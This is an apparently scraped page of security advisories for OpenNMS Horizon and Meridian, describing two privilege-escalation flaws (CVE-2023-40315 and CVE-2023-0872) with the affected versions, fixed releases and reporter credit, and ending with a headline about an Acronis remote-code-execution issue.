In OpenNMS Horizon 31.0.8 and versions earlier than 32.0.2 and related Meridian versions, any user that has the ROLE_FILESYSTEM_EDITOR can easily escalate their privileges to ROLE_ADMIN or any other role. The solution is to upgrade to Meridian 2023.1.5 or Horizon 32.0.2 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet. OpenNMS thanks Erik Wynter for reporting this issue.

CVE-2023-40315: NMS-15702: Only members of ROLE_ADMIN can view/edit users.xml by christianpape · Pull Request #6250 · OpenNMS/opennms

In OpenMNS Horizon 31.0.8 and versions earlier than 32.0.2 and related Meridian versions, any user that has the ROLE_FILESYSTEM_EDITOR can easily escalate their privileges to ROLE_ADMIN or any other role. The solution is to upgrade to Meridian 2023.1.5 or Horizon 32.0.2 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet. OpenNMS thanks Erik Wynter for reporting this issue.

GHSA-w5gq-xrrp-3fxf: OpenNMS privilege elevation vulnerability

The Horizon REST API includes a users endpoint in OpenNMS Horizon 31.0.8 and versions earlier than 32.0.2 on multiple platforms is vulnerable to elevation of privilege. The solution is to upgrade to Meridian 2023.1.6, 2022.1.19, 2021.1.30, 2020.1.38 or Horizon 32.0.2 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet. OpenNMS thanks Erik Wynter for reporting this issue.

CVE-2023-0872: NMS-15703: Do not allow ROLE_REST to modify users by fooker · Pull Request #6354 · OpenNMS/opennms

The Horizon REST API includes a users endpoint in OpenMNS Horizon 31.0.8 and versions earlier than 32.0.2 on multiple platforms is vulnerable to elevation of privilege. The solution is to upgrade to Meridian 2023.1.6, 2022.1.19, 2021.1.30, 2020.1.38 or Horizon 32.0.2 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet. OpenNMS thanks Erik Wynter for reporting this issue.

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution